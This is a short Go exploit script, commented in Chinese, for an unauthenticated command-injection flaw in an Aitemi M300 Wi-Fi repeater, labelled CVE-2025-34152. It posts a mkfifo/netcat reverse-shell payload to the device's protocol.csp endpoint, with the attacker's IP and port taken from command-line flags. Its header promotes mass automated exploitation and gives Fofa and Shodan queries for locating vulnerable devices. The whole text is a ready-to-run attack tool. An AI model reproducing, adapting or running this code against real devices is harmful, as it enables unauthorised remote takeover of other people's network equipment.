1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
|
package main
import (
"flag"
"fmt"
"io"
"net/http"
"net/url"
"os"
"strings"
)
/*
深圳爱特米M300 Wi-Fi中继器未授权RCE (CVE-2025-34152)
- 不需要身份验证(即使登录面板已启用)
- 不会重启设备
- 不影响网络配置
- 适合大规模自动化利用
搜索语法:
- Fofa: icon_hash="-741058468" && server="lighttpd/1.4.32"
- Shodan: http.favicon.hash:-741058468 lighttpd/1.4.32
*/
func main() {
host := flag.String("u", "", "目标主机URL(例如:http://192.168.11.1)")
lhost := flag.String("i", "", "反向shell的攻击者IP")
lport := flag.String("p", "", "反向shell的攻击者端口")
proxyURL := flag.String("x", "", "可选代理URL(例如:http://127.0.0.1:8080)")
flag.Parse()
if *host == "" || *lhost == "" || *lport == "" {
fmt.Printf("用法:%s -u <主机URL> -i <本地主机> -p <本地端口> [-x <代理URL>]\n", os.Args[0])
os.Exit(1)
}
h := strings.TrimRight(*host, "/")
endpoint := h + "/protocol.csp?"
raw := fmt.Sprintf("$(mkfifo /tmp/x; nc %s %s < /tmp/x | /bin/sh > /tmp/x 2>&1)", *lhost, *lport)
encoded := url.QueryEscape(raw)
encoded = strings.ReplaceAll(encoded, "+", "%20")
body := fmt.Sprintf("fname=system&opt=time_conf&function=set&time=%s", encoded)
req, err := http.NewRequest("POST", endpoint, strings.NewReader(body))
if err != nil {
fmt.Printf("[!] 请求创建失败:%v\n", err)
os.Exit(1)
}
transport := &http.Transport{}
if *proxyURL != "" {
parsedURL, err := url.Parse(*proxyURL)
if err != nil {
fmt.Printf("[!] 无效的代理URL:%v\n", err)
os.Exit(1)
}
transport.Proxy = http.ProxyURL(parsedURL)
}
client := &http.Client{Transport: transport}
resp, err := client.Do(req)
if err != nil {
fmt.Printf("[!] 请求失败:%v\n", err)
os.Exit(1)
}
defer resp.Body.Close()
fmt.Printf("[+] 响应 %d\n", resp.StatusCode)
data, err := io.ReadAll(resp.Body)
if err != nil {
fmt.Printf("[!] 读取响应失败:%v\n", err)
os.Exit(1)
}
fmt.Println(string(data))
}
|